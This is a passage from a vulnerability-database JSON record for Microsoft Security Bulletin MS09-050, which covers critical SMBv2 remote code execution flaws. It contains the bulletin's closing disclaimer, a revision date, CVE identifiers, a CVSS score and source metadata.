site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\nTop of sectionTop of section\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 (October 13, 2009): Bulletin published.", "edition": 1, "reporter": "Securityvulns", "published": "2009-10-13T00:00:00", "title": "Microsoft Security Bulletin MS09-050 - Critical Vulnerabilities in SMBv2 Could Allow Remote Code Execution (975517)", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:31", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2009-2532", "CVE-2009-2526", "CVE-2009-3103"], "modified": "2009-10-13T00:00:00", "id": "SECURITYVULNS:DOC:22607", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22607", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
